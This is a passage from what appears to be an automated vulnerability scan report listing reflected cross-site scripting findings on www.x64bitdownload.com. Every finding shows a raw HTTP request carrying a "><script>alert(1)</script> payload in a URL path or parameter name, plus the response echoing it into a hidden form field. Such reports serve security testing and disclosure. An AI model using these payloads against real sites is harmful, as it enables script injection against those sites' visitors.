GET /64-bit-client-downloads.html107a5"><script>alert(1)</script>5d3bbdbca7a HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:32 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91204


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-client-downloads.html107a5"><script>alert(1)</script>5d3bbdbca7a" />
...[SNIP]...

4.1507. http://www.x64bitdownload.com/64-bit-client-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-client-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44255"><script>alert(1)</script>7cf0f112265 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-client-downloads.html?44255"><script>alert(1)</script>7cf0f112265=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:52:26 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91207


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-client-downloads.html?44255"><script>alert(1)</script>7cf0f112265=1" />
...[SNIP]...

4.1508. http://www.x64bitdownload.com/64-bit-conference-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-conference-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32275"><script>alert(1)</script>ad9b1cf51f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-conference-downloads.html?32275"><script>alert(1)</script>ad9b1cf51f1=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:38 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-conference-downloads.html?32275"><script>alert(1)</script>ad9b1cf51f1=1" />
...[SNIP]...

4.1509. http://www.x64bitdownload.com/64-bit-cross-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-cross-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9436b"><script>alert(1)</script>9d161df1015 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-cross-downloads.html9436b"><script>alert(1)</script>9d161df1015 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:43:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90543


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-cross-downloads.html9436b"><script>alert(1)</script>9d161df1015" />
...[SNIP]...

4.1510. http://www.x64bitdownload.com/64-bit-cross-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-cross-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6bda"><script>alert(1)</script>b40157044c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-cross-downloads.html?e6bda"><script>alert(1)</script>b40157044c5=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:49 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90546


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-cross-downloads.html?e6bda"><script>alert(1)</script>b40157044c5=1" />
...[SNIP]...

4.1511. http://www.x64bitdownload.com/64-bit-download-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-download-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8728"><script>alert(1)</script>1a0285ae469 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-download-downloads.htmlb8728"><script>alert(1)</script>1a0285ae469 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94367


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-download-downloads.htmlb8728"><script>alert(1)</script>1a0285ae469" />
...[SNIP]...

4.1512. http://www.x64bitdownload.com/64-bit-download-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-download-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51f31"><script>alert(1)</script>f94cfc1ffad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-download-downloads.html?51f31"><script>alert(1)</script>f94cfc1ffad=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:43:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94370


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-download-downloads.html?51f31"><script>alert(1)</script>f94cfc1ffad=1" />
...[SNIP]...

4.1513. http://www.x64bitdownload.com/64-bit-downloader-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-downloader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e057"><script>alert(1)</script>bfedfe770d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-downloader-downloads.html1e057"><script>alert(1)</script>bfedfe770d3 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:02 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98455


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-downloader-downloads.html1e057"><script>alert(1)</script>bfedfe770d3" />
...[SNIP]...

4.1514. http://www.x64bitdownload.com/64-bit-downloader-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-downloader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cabf"><script>alert(1)</script>1c16e82e365 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-downloader-downloads.html?6cabf"><script>alert(1)</script>1c16e82e365=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98458


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-downloader-downloads.html?6cabf"><script>alert(1)</script>1c16e82e365=1" />
...[SNIP]...

4.1515. http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feff5"><script>alert(1)</script>b66c185e6a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.htmlfeff5"><script>alert(1)</script>b66c185e6a5 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:08 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A32%3A%22ext2fs-ext3fs-paragon-extbrowser%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A32%3A%22ext2fs+ext3fs+paragon+extbrowser%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30030


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.htmlfeff5"><script>alert(1)</script>b66c185e6a5" />
...[SNIP]...

4.1516. http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 613af"><script>alert(1)</script>6093e6a1fe2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html?613af"><script>alert(1)</script>6093e6a1fe2=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:12 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A32%3A%22ext2fs-ext3fs-paragon-extbrowser%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A32%3A%22ext2fs+ext3fs+paragon+extbrowser%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30033


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html?613af"><script>alert(1)</script>6093e6a1fe2=1" />
...[SNIP]...

4.1517. http://www.x64bitdownload.com/64-bit-fast-download-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-fast-download-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ab62"><script>alert(1)</script>4dead600d30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-fast-download-downloads.html9ab62"><script>alert(1)</script>4dead600d30 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22fast-download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22fast+download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96386


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-fast-download-downloads.html9ab62"><script>alert(1)</script>4dead600d30" />
...[SNIP]...

4.1518. http://www.x64bitdownload.com/64-bit-fast-download-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-fast-download-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa2d1"><script>alert(1)</script>9e67a9dcdbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-fast-download-downloads.html?fa2d1"><script>alert(1)</script>9e67a9dcdbd=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22fast-download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22fast+download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96389


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-fast-download-downloads.html?fa2d1"><script>alert(1)</script>9e67a9dcdbd=1" />
...[SNIP]...

4.1519. http://www.x64bitdownload.com/64-bit-feed-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-feed-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4260b"><script>alert(1)</script>fce09807565 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-feed-downloads.html4260b"><script>alert(1)</script>fce09807565 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92842


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-feed-downloads.html4260b"><script>alert(1)</script>fce09807565" />
...[SNIP]...

4.1520. http://www.x64bitdownload.com/64-bit-feed-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-feed-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a07ec"><script>alert(1)</script>6e593dfd62f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-feed-downloads.html?a07ec"><script>alert(1)</script>6e593dfd62f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:04 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92845


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-feed-downloads.html?a07ec"><script>alert(1)</script>6e593dfd62f=1" />
...[SNIP]...

4.1521. http://www.x64bitdownload.com/64-bit-feedreader-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-feedreader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3c51"><script>alert(1)</script>c2a577b8281 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-feedreader-downloads.htmlb3c51"><script>alert(1)</script>c2a577b8281 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:02 GMT
